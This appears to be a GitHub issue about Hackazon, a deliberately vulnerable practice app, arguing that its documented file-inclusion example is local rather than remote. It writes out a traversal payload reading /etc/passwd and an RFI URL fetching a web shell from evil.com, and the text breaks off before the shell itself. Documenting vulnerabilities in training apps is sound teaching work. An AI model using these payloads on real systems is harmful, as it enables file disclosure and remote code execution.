Vulnerability Misclassified

[jhaddix]

In your practise application you have misclassified LFI as RFI.

on https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md

you say:

Remote File Include:

RFI Injection allows to use an app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:

http://hackazon.dev/account/help_articles?page=add_product_to_cart
Vulnerability can be used as such:

http://hackazon.dev/account/help_articles?page=/etc/passwd%00

This is pulling a local file, and the vuln present is LFI not RFI.

RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:

http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt

the value of which would be a web shell like so: